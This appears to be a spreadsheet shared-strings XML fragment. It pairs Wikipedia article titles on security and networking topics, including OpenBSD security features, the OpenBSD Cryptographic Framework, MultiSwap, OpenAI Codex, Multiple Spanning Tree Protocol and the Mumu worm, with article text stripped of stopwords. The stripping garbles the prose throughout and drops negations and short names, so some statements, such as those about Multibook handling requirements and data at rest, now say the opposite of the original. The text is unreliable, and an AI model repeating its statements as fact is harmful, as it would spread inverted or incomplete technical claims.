daemon, including head body, head completed time openbsd 2.3. body well pitchfork tail completed openbsd 2.4.subsequent releases used variations police daemon semaka, eventually settled pufferfish named puffy. since then, puffy appeared openbsd promotional material featured release songs artwork. promotional material early openbsd releases cohesive theme design, later cd-roms, release songs, posters tee-shirts release produced single style theme, sometimes contributed semaka plaid tongued devils. these become part openbsd advocacy, release expounding moral political point important project, often parody.themes included puff barbarian openbsd 3.3, included rock song parody conan barbarian alluding open documentation, wizard openbsd 3.7, related project's work wireless drivers, hackers lost raid, parody indiana jones referencing raid tools openbsd 3.8. releases following table summarizes version history openbsd operating system. also comparison operating systems comparison open-source operating systems kame project, responsible openbsd's ipv6 support openbsd journal openbsd security features security-focused operating system unix security notes references external links official website github mirror openbsd manual pages openbsd ports packages (latest) openbsd source code search</t>
  </si>
  <si>
    <t>OpenBSD security features</t>
  </si>
  <si>
    <t>openbsd operating system focuses security development security features.: xxvii according author michael lucas, openbsd widely regarded secure operating system available anywhere, licensing terms.": xxix build changes bugs security flaws often caused programmer error. common source error misuse strcpy strcat string functions programming language. there common alternatives, strncpy strncat, difficult understand easy misuse, openbsd developers todd miller theo raadt designed strlcpy strlcat functions. these functions intended make harder programmers accidentally leave buffers unterminated allow overflowed. they adopted netbsd freebsd projects library.on openbsd, linker changed issue warning unsafe string manipulation functions, strcpy, strcat, sprintf, found. occurrences functions openbsd source tree replaced. addition, static bounds checker included openbsd attempt find common programming mistakes compile time. other security-related apis developed openbsd project include issetugid arc4random. kernel randomization june 2017 email, theo raadt stated problem stable systems could running months time. although considerable randomization within kernel, addresses remains same. project progress modifies linker every boot, kernel relinked, well randomizations. this differs kernel aslr; email states result, every kernel unique. relative offsets functions data unique [the current] change scaffolding ensure boot newly-linked kernel upon every reboot random kernel linked together fast machine takes less second reboot runs kernel, another kernel built next boot. internal deltas functions inside kernel attacker expects he'll need better info leaks". memory protection openbsd integrates several technologies help protect operating system attacks buffer overflows integer overflows. developed hiroaki etoh, propolice extension designed protect applications stack-smashing attacks. number operations: local stack variables reordered place buffers pointers, protecting corruption case buffer overflow; pointers function arguments also placed local buffers; canary value placed local buffers which, function exits, sometimes used detect buffer overflows. propolice chooses whether protect buffer based automatic heuristics judge vulnerable reducing performance overhead protection. integrated openbsd's version december 2002, first made available openbsd 3.3; applied kernel release 3.4. extension works architectures supported openbsd enabled default, code compiled protected without user intervention.in 2004, openbsd sparc platform received stack protection form stackghost. this makes features sparc architecture help prevent exploitation buffer overflows. support sparc64 added -current march 2005. openbsd introduced w^x, memory management scheme ensure memory either writable executable, never both, provides another layer protection buffer overflows. while relatively easy implement platform like x86-64, hardware support bit, openbsd oses support generic i386 platform, lacks built per-page execute controls. during development cycle release, changes made malloc memory management functions. traditional unix operating systems, malloc allocates memory extending unix data segment, practice made difficult implement strong protection security problems. malloc implementation openbsd makes mmap system call, modified returns random memory addresses ensures different areas mapped next other. addition, allocation small blocks shared areas randomized free function changed return memory kernel immediately rather leaving mapped process. number additional, optional checks also added development. these features make program bugs easier detect harder exploit: instead memory corrupted invalid access ignored, often result segmentation fault abortion process. this brought light several issues software running openbsd 3.8, particularly programs reading beyond start buffer, type would previously detected directly cause error. these abilities took three years implement without considerable performance loss. cryptography randomization goals openbsd project integration facilities software strong cryptography core operating system. end, number low-level features provided, including source strong pseudo random numbers; built-in cryptographic hash functions transforms; support cryptographic hardware (openbsd cryptographic framework). these abilities used throughout openbsd, including bcrypt password-hashing algorithm derived bruce schneier's blowfish block cipher, takes advantage cpu-intensive blowfish schedule, making brute-force attacks less practical. protect sensitive information passwords leaking disk, persist many years, openbsd supports encryption swap partition. swap space split many small regions assigned encryption key: soon data region longer required, openbsd securely deletes discarding encryption key. this feature enabled default openbsd later. network stack also makes heavy randomization increase security reduce predictability various values attacker, including initial sequence numbers timestamps, ephemeral source ports. number features increase network resilience availability, including countermeasures problems icmp software redundancy, carp pfsync, also included. project first disable plain-text telnet daemon favor encrypted daemon, 1999, features integrated cryptographic software ipsec. telnet daemon completely removed openbsd 2005 release openbsd version 3.8. openbsd project invented utility cryptographic signing verification files, signify, instead using existing standards software openpgp gnupg. creator signify utility, unangst, wrote 2015, speaking openpgp gnupg: "the concerns using existing tool complexity, quality, complexity." this line project's longtime tendency reduce complexity, turn, reduce probability vulnerabilities existing software, help user understand software better make security-educated decisions. signify integrated base operating system used verification releases, patches, packages starting openbsd 5.5. contrast, free software operating systems security-focused software tend openpgp release verification, 2022 continue including: debian, prominent operating system that's also used base operating systems, including ubuntu; kali linux, specialized operating system penetration testing, security research, digital forensics, reverse engineering; qubes security-focused operating system; browser, anonymous browser; securedrop, software package journalists whistleblowers exchange information securely anonymously internet; veracrypt, software program on-the-fly encryption full disk encryption. openbsd, neither server clients normally escalated direct memory hardware privileges: when driving intel(4) radeon(4) drivers, normally interact underlying hardware direct rendering management(4) kernel interface only, lowlevel memory/hardware access handled solely kernel. other drivers wsfb follow similar pattern. reason, openbsd open lowlevel memory hardware access user/root programs done systems, done past, needed user escalate machdep.allowaperture setting default zero setting, unsecure setting.openbsd's version window system (named xenocara) security modifications. server default applications patched make privilege separation, openbsd provides "aperture" driver limit access memory. however, work security flaws loïc duflot, theo raadt commented aperture driver merely "the best "violates security models hear university class." went castigate developers "taking time solving 10-year-old problem." november 2006, vesa kernel driver developed permitted run, albeit slowly, without aperture driver.on february 2014, modified allow without root privileges.after discovery security vulnerability openbsd support running root user supports running display manager dedicated _x11 user. other features privilege separation, privilege revocation, chrooting randomized loading libraries also play role increasing security system. many applied openbsd versions common programs tcpdump apache, authentication system. openbsd history providing users full disclosure relation various bugs security breaches detected openbsd team. this exemplified project's slogan: "only remote holes default install, heck long time!" openbsd 5.3, support full disk encryption introduced.openbsd included support then–new pledge system call (introduced openbsd tame renamed pledge) restricting process capabilities minimal subset required correct operation. process compromised attempts perform unintended behavior, terminated kernel. since introduction, applications ports changed support pledge, including chromium browser. openbsd introduced unveil system call restricting filesystem visibility minimum level. references external links exploit mitigation techniques: update after years theo raadt's email secure programming: matter strlcpy/strlcat acceptance industry</t>
  </si>
  <si>
    <t>OpenBSD Cryptographic Framework</t>
  </si>
  <si>
    <t>openbsd cryptographic framework (ocf) service virtualization layer uniform management cryptographic hardware operating system. part openbsd project, included operating system since openbsd (december, 2000). like openbsd projects openssh, ported systems based berkeley unix freebsd netbsd, solaris linux. linux ports supported intel proprietary cryptographic software hardware provide hardware-accelerated encryption open source apache http server. background cryptography computationally intensive used many different contexts. software implementations often serve bottleneck information flow increase network latency. specialist hardware cryptographic accelerators mitigate bottleneck problem introducing parallelism. certain kinds hardware, hardware random number generators, also produce randomness reliably pseudo-random software algorithm exploiting entropy natural events.unlike graphics applications games film processing similar hardware accelerators common strong operating system support, hardware cryptography relatively uptake. late 1990s, need uniform operating system layer mediate cryptographic hardware application software used lack layer production applications hard-coded work small range cryptographic accelerators. openbsd project, history integrating strong, carefully audited cryptography operating system's core, produced framework provision cryptographic hardware acceleration operating system service. /dev/crypto application-level support provided pseudo-device /dev/crypto, provides access hardware drivers standard ioctl interface. this simplifies writing applications removes need application programmer understand operational details actual hardware used. /dev/crypto removed openbsd 5.7, superseded crypto_ suite syscalls. implications subsystems openbsd implementation ipsec, packet-level encryption protocol, altered packets decoded batches, improves throughput. rationale maximize efficiency hardware usage—larger batches reduce transmission overhead—but practice ipsec developers found strategy improves efficiency even software implementations. many intel firmware hubs i386 motherboards provide hardware random number generator, possible facility used provide entropy ipsec. because openssl uses ocf, systems hardware supports rsa, cryptographic protocols automatically hardware without modification software. backdoor allegations investigated december 2010, former government contractor named gregory perry sent email openbsd project leader theo raadt alleging paid openbsd ex-developers years previously compromise security system, inserting number backdoors side channel leaking mechanisms ocf". theo raadt made email public december forwarding openbsd-tech mailing list suggested audit ipsec codebase. raadt's response skeptical report invited developers independently review relevant code. weeks followed, bugs fixed evidence backdoors found. similarly named solaris product oracle's proprietary operating system solaris (originally developed sun) features unrelated product called solaris cryptographic framework, plug-in system cryptographic algorithms hardware. also openbsd security features crypto (linux) microsoft cryptoapi references external links cryptography openbsd, overview document provided openbsd project. linux project.</t>
  </si>
  <si>
    <t>MultiSwap</t>
  </si>
  <si>
    <t>cryptography, multiswap block cipher/mac created microsoft 1999 part windows media service (wmdrm). microsoft's internal name algorithm publicly known; dubbed multiswap 2001 report wmdrm pseudonym "beale screamer". cipher block size bits, halves processed nearly separately. arithmetic operations performed 232. encryption process, half block added output previous half block. next undergoes multiplications 32-bit subkeys, followed swap 16-bit halves. then final subkey added half blocks separate subkeys, multipliers forced odd, total size bits. name multiswap comes cipher's multiplications swaps. wmdrm uses algorithm mac, never encryption. borisov, applied multiplicative form differential cryptanalysis break multiswap. references beale screamer october 2001). "microsoft's digital rights management scheme technical details". retrieved september 2007. nikita borisov, monica chew, johnson, david wagner. "cryptanalysis multiswap". retrieved october 2010.{{cite web}}: maint: multiple names: authors list (link) borisov, chew, johnson, wagner (february 2002). multiplicative differentials (pdf/postscript). international workshop fast software encryption (fse '02). leuven: springer-verlag. 17–33. retrieved january 2007.{{cite conference}}: maint: multiple names: authors list (link)</t>
  </si>
  <si>
    <t>Multibook</t>
  </si>
  <si>
    <t>multibook taclane multibook single laptop combines three different classified networks single device solution. currently, secure computing standards require federal government military personnel maintain multiple different networks effort allow users simultaneous access unclassified classified information. multibook simply complex configuration allows separate enclaves virtual machines display. multibook hard drive uses cryptographic ignition create virtual hard drive space type comsec element found inside multibook’s integrated suite security module. security module known haipe protects information stored computer, well data sent networks classified secret below. lack stored collateral data, multibooks burdensome comsec handling requirements. there data rest (dar) equipment turned off.some multibooks certified protect information classified secret below. they approved suite information/processing data transit (dit) encryption protecting information sent classified networks. multibook security benefit user device chvp device considered like devices used collateral processing. references</t>
  </si>
  <si>
    <t>OpenAI Codex</t>
  </si>
  <si>
    <t>openai codex artificial intelligence model developed openai. parses natural language generates code response. used power github copilot, programming autocompletion tool developed visual studio code. codex descendant openai's gpt-3 model, fine-tuned programming applications. openai released codex closed beta. capabilities based gpt-3, neural network trained text, codex additionally trained gigabytes python code million github repositories. typical case codex typing comment, "//compute moving average array given window size", using suggest block code satisfying prompt. openai stated codex complete approximately requests meant make human programming faster rather replace according openai's blog, codex excels "mapping [...] simple problems existing code", describe "probably least part programming". jeremy howard, co-founder fast.ai, stated "[codex] getting code written without write much code" always correct, close enough". according paper written openai researchers, attempting test case times, 70.2% prompts working solutions.openai claims codex able function dozen programming languages, including javascript, perl, php, ruby, shell, swift, typescript, though effective python. according venturebeat, demonstrations uploaded openai showed impressive coreference resolution capabilities. demonstrators able create browser game javascript generate data science charts using matplotlib.openai shown codex able interface services apps mailchimp, microsoft word, spotify, google calendar. microsoft reportedly interested exploring codex's capabilities. issues openai demonstrations showcased flaws inefficient code one-off quirks code samples. interview verge, openai chief technology officer greg brockman said "sometimes [codex] quite know exactly asking" require trial error. openai researchers found codex struggles multi-step higher-level prompts, often failing yielding counter-intuitive behavior. additionally, brought several safety issues, over-reliance novice programmers, biases based training data, security impacts vulnerable code.venturebeat stated codex trained public data, could vulnerable "data poisoning" intentional uploads malicious code. according study researchers york university, approximately code generated github copilot (which uses codex) included glitches exploitable design flaws. copyright free software foundation expressed concerns code snippets generated copilot codex could unknowingly violate copyright, particular condition requires derivative works licensed equivalent terms. issues raised include whether training public repositories falls fair not, developers could discover infringing generated code, whether trained machine learning models could considered modifiable source code compilation training data, machine learning models could copyrighted whom. internal github study found approximately 0.1% generated code contained direct copies training data. specific example raised, model outputted original code fast inverse square root algorithm, including comments incorrect copyright notice.in response, openai stated "legal uncertainty copyright implications training systems imposes substantial costs developers authoritatively resolved." copyright issues codex compared authors guild, inc. google, inc. court case, judges ruled google books's text snippets millions scanned books constituted fair use. references</t>
  </si>
  <si>
    <t>OpenBSM</t>
  </si>
  <si>
    <t>openbsm open source implementation sun's basic security module (bsm) audit file format. bsm, system used auditing, describes system call library interfaces managing audit records well token stream file format permits extensible generalized audit trail processing. openbsm includes system include files appropriate inclusion operating system implementation audit, libbsm, implementation library interfaces generating, parsing, managing audit records, auditreduce praudit, audit reduction printing tools, documentation, sample /etc configuration files. works progress include extensions libbsm support easier audit trail analysis, including pattern matching library. openbsm derived audit implementation found apple's open source darwin operating system, upon request, apple relicensed licence allow integration freebsd systems. darwin implementation created mcafee research contract apple, since extensively extended volunteer trustedbsd team. openbsm included freebsd version later, announced snow leopard feature. external links trustedbsd: openbsm freebsd handbook: security event auditing apple computer: common criteria</t>
  </si>
  <si>
    <t>Multiple Spanning Tree Protocol</t>
  </si>
  <si>
    <t>multiple spanning tree protocol (mstp) algorithm, provides simple full connectivity assigned given virtual (vlan) throughout bridged local area network. mstp uses bpdus exchange information spanning-tree compatible devices, prevent loops msti (multiple spanning tree instances) cist (common internal spanning tree), selecting active blocked paths. this done well without need manually enabling backup links getting switching loop danger. moreover, mstp allows frames/packets assigned different vlans follow separate paths, based independent msti, within regions composed lans bridges. these regions bridges lans connected single common spanning tree (cst). history motivation originally defined ieee 802.1s amendment 802.1q, 1998 edition later merged ieee 802.1q-2005 standard, clearly defines extension evolution radia perlman's spanning tree protocol (stp) rapid spanning tree protocol (rstp). similarities cisco systems' multiple instances spanning tree protocol (mistp), differences. original rstp work physical link level, preventing bridge loops redundant paths present. however, virtualized using vlan trunking, physical link represents multiple logical connections. blocking physical link blocks logical links forces traffic remaining physical links within spanning tree. redundant links cannot utilized all. moreover, without careful network design, seemingly redundant links physical level used connect different vlans blocking disconnect vlans, causing paths. instead, mstp provides potentially better utilization alternate paths enabling alternate spanning trees different vlans groups vlans. main entities multiple spanning tree instances (msti) mstp enables grouping mapping vlans different spanning tree instances, there's urge determining group vlans, using spanning tree, come know msti. each instance defines single forwarding topology exclusive vlans, contrast, rstp networks contains single spanning tree instance entire network, contains vlans. region include: internal spanning-tree instance (ist): default spanning tree instance region. vlans instance conform single spanning tree topology, allowing forwarding path nodes. also provides root switch vlan configured switches specifically assigned msti. multiple spanning tree instance (msti): unlike ist, kind instance comprises static vlans specifically assigned least, must include vlan.while msti multiple vlans, vlan associated msti. mstp regions interconnected switches must configured vlans mstis, also following parameters: configuration name revision level configuration digest: mapping vlan mapped instances.an msti unable span across regions inherent locality single region. this done identifying number msti. achieving task assigning bridge region, switch/bridge must compare configuration identifiers (format selector, region name, revision level configuration digest), either represents vlan mstis mapping bridge. common internal spanning tree (cst/cist) differentiate kinds conformated spanning trees different networks created mstp, are: common spanning tree (cst): administers connectivity among regions, lans rstp lans bridged network. common internal spanning tree (cist): identifies regions network administers cist root bridge network, region spanning tree instance region. it's also default spanning tree instance mstp vlan member particular msti, member cist. furthermore, works well spanning tree runs regions regions single spanning tree (sst) entities.the role common spanning tree (cst) network, common internal spanning tree (cist) configured device, prevent loops within wider network span mstp region parts network running legacy rstp mode. mstp bridge protocol data units (bpdu) main function enabling mstp select root bridges proper cist msti. mstp includes spanning tree information single bpdu format. reduce number bpdus required lans communicate spanning tree information vlan, also ensures backward compatibility rstp (and effect, classic too). bpdus' general format comprises common generic portion -octets based defined ieee standard 802.1d,2004, followed components specific cist -octets 102. components specific msti added bpdus data block. bpdu table info bpdus show deeper resume mstp bpdu format and, besides, additional information object structured older different versions protocol rstp, maintaining compatibility. mstp configuration identification case allocation vids (vlan ids) region differs within different bridges compound frames vids might duplicated even delivered lans all. avoid this, bridges check allocating vids spanning trees neighboring bridges region transmitting receiving configuration identifiers along spanning tree information. these configuration identifiers, compact, designed matching identifiers high probability denoting configuration even absence supporting management practice identifier allocation. either "objects" contains following: configuration identifier format selector: indicates going given following components. configuration name revision level configuration digest: signature hmac-md5 algorithms created configuration table.this object specific unique mstp, neither rstp protocol operation mstp configures every vlan single spanning tree active topology manner there's least data route stations, eliminating data loops. specifies various "objects" allowing algorithm operate proper way. different bridges various vlans start advertising configuration bridges using configuration identifier order allocate frames given vids (vlan different msti. priority vector utilized construct cist, connects bridges lans bridged ensures paths within region always preferred paths outside region. besides, msti priority vector, compromises necessary information build deterministic independently manageable active topology given msti within region. additionally, comparisons calculations done bridge select cist priority vector port (based priority vectors, configuration identifiers incremental path cost associated receiving port). this leads bridge selected cist root bridged lan; then, minimum cost path root shifted bridge lans (thus preventing loops ensuring full connectivity vlans). subsequently, region, bridge whose minimum cost path root pass another bridge conf.id identified region's cist regional root. conversely, bridge whose minimum cost path root bridge using configuration identifier identified region bridge. summary, mstp encodes additional information bpdu regarding region information configuration, messages conveys spanning tree information instance. each instance assigned several configured vlans, frames (packets) assigned vlans operate spanning tree instance whenever inside region. avoid conveying entire vlan spanning tree mapping bpdu, bridges encode digest vlan instance table mstp bpdu. this digest used mstp bridges, along administratively configured values, determine neighboring bridge region itself. port roles common internal spanning tree ports root: provides minimum cost path bridge cist root regional root. designated: provides least cost path attached bridge cist root. alternate backup: provides connectivity bridges, bridges ports lans fail erased. multiple spanning tree instance ports root: provides minimum cost path bridge msti regional root. designated: provides least cost path attached lans bridge regional root. master: provides connectivity region cist root lies outside region. bridge port cist root port cist regional root master port msti. alternate backup: provides connectivity bridges, bridges ports lans fail erased. rstp compatibility mstp designed rstp compatible interoperable without additional operational management practice, measurements based rstp (clause ieee 802.1d, 2004 edition) intending provide capability frames assigned different vlans, transmitted along different paths within regions. both protocols common various issues selection cist root bridge uses fundamental algorithm, 17.3.1 ieee 802.1d, 2004 edition, extended priority vector components within regions), selection msti root bridge computation port roles msti, port roles used cist rstp (with exception master port), state variables associated port. into bargain, also share problems instance: mstp can't protect temporary loops caused inter-connection lans segments devices bridges operate invisibly respect support bridges' internal sublayer service. above, concluded mstp fully compatible rstp bridges, mstp bpdu interpreted rstp bridge rstp bpdu. this allows compatibility rstp bridges without configuration changes, also causes rstp bridges outside mstp region region single rstp bridge, regardless number mstp bridges inside region itself. protocol configuration this section mainly oriented provide user proper manner configuring mstp network cisco devices. before configuring mstp sure configured vlans associated switch ports, afterwards determine: mstp regions, revision level instances; vlans switch ports belong mstis and, finally, devices want root bridges msti. configuration guidelines mstp switches must configuration identification elements (region name, revision level vlan msti mapping) region. when configuring multiple regions mstp, mstis locally significant within region. mstis span region another region. common internal spanning tree (cist) default spanning tree instance mstp. this means vlans explicitly configured another msti members cist. software supports single instance mstp algorithm consisting cist mstis.a vlan mapped msti cist. vlan mapped multiple spanning trees allowed. vlans mapped cist default. once vlan mapped specified msti, removed cist.to avoid unnecessary processing, port attached bridges/switches attached, configured edge port. example configure simple, three switch mstp topology wherein layer-two access switch carries four vlans uplinks distribution switches, found here: mstp configuration guide good configuration view, above-mentioned example shall show spanning-tree ##### mst0 vlans mapped: 1-19,21-39,41-4094 bridge address 000e.8316.f500 priority 32768 (32768 sysid root address 0013.c412.0f00 priority sysid port fa0/13 path cost regional root address 0013.c412.0f00 priority sysid internal cost 200000 hops operational hello time forward delay txholdcount configured hello time forward delay hops interface role cost prio.nbr type ---------------- ---- --------- -------- -------------------------------- fa0/13 root 200000 128.13 fa0/16 altn 200000 128.16 ##### mst1 vlans mapped: 20,40 bridge address 000e.8316.f500 priority 32769 (32768 sysid root address 000f.345f.1680 priority sysid port fa0/16 cost 200000 hops interface role cost prio.nbr type ---------------- ---- --------- -------- -------------------------------- fa0/13 altn 200000 128.13 fa0/16 root 200000 128.16 extensions alternative multiple spanning tree protocol (amstp) first skel protocol proposed amstp simplified tree instance rooted edge bridge core forward frames. protocol operation trees, amstp relies basic tree used obtain instances (named alternate multiple spanning tree instances amsti), built switch network. process applied build main/basic tree rstp. summary, firstly bridge must elected root bridge (this done emission bpdus switch network periodically, every "hello time", selecting lowest bridge id). then, every switch compute calculate cost root bridge and, afterwards, root ports must elected selecting receives best bpdu, announces minimum path cost root bridge. bpdus amstp bpdus local multicast protocol addresses structure resembles mstp bpdus since comprised essentially basic bpdu several am-records, allowing full-backwards compatibility rstp standard protocols. each am-records contains data used negotiate specific tree instance (amsti). every abridge, except elected root bridge, creates am-record spanning tree instances. they used connected ports neighboring switches negotiate transitions tree instance proposal/agreement mechanism. abridges this protocol, developed emphasizes terms efficiency network usage path length. that's main cause uses amstp, simplified self-configuring version mstp protocol. abridges described two-tiered hierarchy layer-two switches network islands running independent rapid spanning tree protocols communicate core formed island root bridges (abridges). mentioned, focused terms efficiency, ability amstp provide optimum paths core mesh usage rstp aggregate efficiently traffic islands networks. convergence speed fast rstp mstp. architecture with objective enhancing properties abridges protocol, two-level hierarchical link layer infrastructure segmentation performed link layer proposed. core composed, primarily, abridges (bridges using implementation amstp) oversee connecting leaf access networks referred "access layer". besides, access networks, also called islands, layer-two sub-network using connected abridges. protocol operation inside every island access network bridge automatically elected behave root bridge, bridge behave gateway, allowing forwarding frames core island conversely. just abridge going perform gateway functions, although many could connected. communication among 802.1d bridges standard 802.1d bridges abridges require point-to-point connections. abridge receiving frame island host obtains island destination located asking server host previously registered island abridge. this server stores mapping island abridge servers distribute load based equal result short hashing addresses served. core self-configures operation transparent hosts standard switches islands. abridges functionality abridges composed three basic functional modules, could resumed bridge: performs standard bridging functions nodes island. access functionality resides access ports module, equivalent behavior standard bridge acting root bridge. amstp routing: routes frames abridges gateway. core ports, either interconnect abridges, learn root bridge amstp bpdus received store information database, known "forwarding database". gateway: interconnects above-mentioned modules.abridges configure ports part either core island, port self-configuration done simple stipulations: port connected another abridge using point-to-point link, turn access port; hand, ports directly connected another abridge configured core ports. this auto-configuration mechanism pretty like used rstp. abridge resolution layer-two based protocol, abridges uses broadcasts obtain link layer address associated address vlan. that main cause avoiding overflooding matter paramount priority; limit broadcast traffic, recommended distributed load servers, although compulsory. also bridge protocol data unit distributed minimum spanning tree etherchannel ethernet automatic protection switching flex links media redundancy protocol minimum spanning tree trill (transparent interconnection lots links) unidirectional link detection virtual link trunking references external links ieee "home page" 802.1 (related standards 802.1 family) mstp tutorial (brief tutorial comprehension mstp) rbridge cisco implementations (cisco implementation brief tutorial mstp) cisco home page spanning-tree protocol family (discusses cst, mistp, pvst, pvst+, rstp, stp) educational explanation www.cisco.com perlman, radia. "algorhyme". university california berkeley. archived original 2011-07-19. retrieved 2011-09-01. ieee standards ansi/ieee 802.1d-2004 standard, section discusses rstp (regular longer part standard. this pointed section ansi/ieee 802.1q-2005 standard, section discusses mstp rfcs 2271-1998, architecture describing snmp management frameworks 2571-1999, architecture describing snmp management frameworks 2674-1999,- proposed standard, definitions managed objects bridges traffic classes, multicast filtering virtual extensions 1525-1993, sbridgemib, proposed standard, definitions managed objects source routing bridges 1493-1993 bridgemib, draft standard, definitions managed objects bridges abridge standard</t>
  </si>
  <si>
    <t>Rambutan (cryptography)</t>
  </si>
  <si>
    <t>rambutan family encryption technologies designed communications-electronics security group (cesg), technical division united kingdom government's secret communications agency, gchq. includes range encryption products designed cesg handling confidential (not secret) communications parts british government, government agencies, related bodies trusts. unlike cesg's pike system, rambutan available software: distributed self-contained electronic device asic) implements entire cryptosystem handles related distribution storage tasks. rambutan sold outside government sector.technical details rambutan algorithm secret. security researcher bruce schneier describes stream cipher (linear-feedback shift register) based cryptosystem shift registers around bits, size bits. rambutan-i communications chips (which implement secure x.25 based communications system) made approved contractors racal baltimore technologies/zergo ltd. cesg later specified rambutan-ii, enhanced system backward compatibility existing rambutan-i infrastructure. rambutan-ii chip 64-pin quad ceramic pack chip, implements electronic codebook, cipher block chaining, output feedback operating modes (each bits) cipher feedback mode bits. schneier suggests modes indicate rambutan block cipher rather stream. three modes operate megabits/second. rambutan operates three modes: ecb, cbc, cfb. references</t>
  </si>
  <si>
    <t>Multiprogram Research Facility</t>
  </si>
  <si>
    <t>multiprogram research facility (mrf, also known building 5300) facility ridge national laboratory ridge, tennessee. used u.s. national security agency (nsa) design build supercomputers cryptanalysis classified projects. houses classified component program high productivity computing systems (hpcs) project sponsored defense advanced research projects agency (darpa). history high productivity computing systems program launched 2004 multiagency project darpa goal increasing computing speed thousandfold, creating supercomputer capable petaflop quadrillion [1015] floating-point operations second). project sited ridge national laboratory tennessee split tracks, secret unclassified, housed separate facilities. secret facility, used nsa, located within building 5300 laboratory known multiprogram research facility.the constructed 2006 cost million. located laboratory's east campus, building covers 214,000 square feet (19,900 rises five stories high. 2012, staffed computer scientists engineers.while unclassified portion hpcs project succeeded designing petaflop cray supercomputer 2007, succeeded developing even faster machine, designed specifically cryptanalysis targeted specific algorithms, advanced encryption standard (aes). former official called mrf's breakthrough "enormous", giving agency ability break current public encryption standards. data upon supercomputer operates stored agency's utah data center bluffdale, utah.the mrf's next goal achieve machine capable exaflop (1018 floating-point operations second) zetaflop (1021). achieve exaflop machine 2018, proposed constructing connecting buildings, totaling 260,000 square feet (24,000 m2), called multiprogram computational data center. buildings store dozens computer cabinets comprise exaflop machine. facility eventually megawatts power—enough power around 200,000 homes—and require 60,000 short tons (54,000 tonnes) cooling equipment. also exascale computing references</t>
  </si>
  <si>
    <t>Multiservice Switch</t>
  </si>
  <si>
    <t>multiservice switch (mss) originally nortel line routers, historically called passport, designed carrier core edge routing. they passport carrier release operating system. significant installed base, 40,000 switches sold. september 2010, product line sold ericsson. nortel products rebranded ericsson ppx. features some core features multiservice switch series are: mpls vpns rfc2764 vpns sonet/atm, frame relay ethernet media support ipv4 routing (layer layer traffic management architecture multiservice switches made shelf cards. there types cards consider: control processor switch fabric processor: controls shelf functionality, well controls routing well manages provisioning interface; function processor essence line card, processing logic queue logic card. this allows packets directly manipulated decreasing load normally process data frames ingress path autonomously forward frames egress ports without processing protocol control software egress this done implementing backplane transfer, egress queuing subsequent transmission using asics.a shelf master, spare) (including spares). historically gone generations fabric control processors, starting i960 initially, later moving powerpc. software development started 1990 hardware available applying paravirtualization techniques vxworks running application payload sparc workstations, unix user process. models multiservice switch line divided several different models. this division historical technical. 15000/20000 top-of-the-line switch backplane capable excess gbit/s data transfer. this latest revision line. 6400 original passport switches, 6400 significant historical installed base. based redundant dual mbit/s backplane. 6400 several different configurations available, three slot 6420, five slot 6440, slot 6480. 7400 initially running hardware 6400, 7400 uses passport carrier release software only. 7400 range includes three-slot 7420 (discontinued), five-slot 7440, eight-slot 7460, 16-slot 7480. 9400 16-slot 9480 moves away dual shared 800mbit/s backplanes found 6400/7400 series products. 9480 backplane switched, providing dedicated dual line card. most current 7400 line cards work 9480 chassis. supported media types there number media types supported multiservice switch, modern historical. example, nortel offers line cards provide packet sonet oc192 speeds (depending fabric capacity). well, frame relay historical interfaces purchased. more recently, ethernet become focus switches, 10/100/1000 media types supported (again depending fabric capacity). other uses chassis architecture integral part nortel's cdma alcatel-lucent's (through acquisition) umts solutions. these switches enhanced versions nortel's passport carrier release software, effectively multiservice switches. also nortel passport carrier release references external links multiservice switch 6400 multiservice switch 7400 multiservice switch 15000/20000</t>
  </si>
  <si>
    <t>Mumu (computer worm)</t>
  </si>
  <si>
    <t>mumu computer worm isolated june 2003. description mumu consists malicious files actual utilities. because easily customised nature worm, many variants discovered, generically detected mumu.a name. lone exception mumu.b, detected separately antivirus programs. "standard" mumu package consists following: range malicious batch files number "grey area" batch files, utilities included mumu package malicious pcghost and/or nvidia utility, legitimate utilities other various legitimate utilities number text filesas previously mentioned, varies version. mumu spreads scanning addresses open administrative network shares. attempts guess password gain access copy over. heavy correlation mumu infections infections valla virus observed. suspected mumu caused resurgence valla infections valla infected .exe files included mumu package. previous this, valla considered obsolete. ranks among most-reported viruses wildlist. external links mumu removal tool symantec sophos mcafee muma</t>
  </si>
  <si>
    <t>Open Virtualization Format</t>
  </si>
  <si>
    <t>open virtualization format (ovf) open standard packaging distributing virtual appliances generally, software virtual machines. standard describes "open, secure, portable, efficient extensible format packaging distribution software virtual machines". standard tied particular hypervisor instruction architecture. unit packaging distribution so-called package contain virtual systems deployed virtual machine. history september 2007 vmware, dell, ibm, microsoft xensource submitted distributed management task force (dmtf) proposal ovf, named "open virtual machine format".the dmtf subsequently released specification v1.0.0 preliminary standard september, 2008, v1.1.0 january, 2010. january 2013, dmtf released second version standard, applies emerging cloud cases provides important developments including improved network configuration support package encryption capabilities safe delivery. ansi ratified 1.1.0 ansi standard incits 469-2010.ovf adopted august 2011 iso/iec 1/sc international organization standardization (iso) international electrotechnical commission (iec) international standard iso/iec 17203.ovf brings enhanced capabilities packaging virtual machines, making standard applicable broader range cloud cases emerging industry enters cloud era. significant improvements include support network configuration along ability encrypt package ensure safe delivery. design package consists several files placed directory. package always contains exactly descriptor file extension .ovf). descriptor file describes packaged virtual machine; contains metadata package, name, hardware requirements, references files package human-readable descriptions. addition descriptor, package typically contain disk images, optionally certificate files auxiliary files.the entire directory distributed open virtual appliance (ova) package, archive file directory inside. industry support generally broadly accepted. several virtualization players industry announced support ovf. also (file format) vmdk references external links official website dmtf whitepaper vmware whitepaper</t>
  </si>
  <si>
    <t>Open Source Tripwire</t>
  </si>
  <si>
    <t>open source tripwire free software security data integrity tool monitoring alerting specific file change(s) range systems. project based code originally contributed tripwire, inc. 2000. also aide host-based intrusion detection system comparison ossec samhain references external links tripwire, inc.</t>
  </si>
  <si>
    <t>MyDLP</t>
  </si>
  <si>
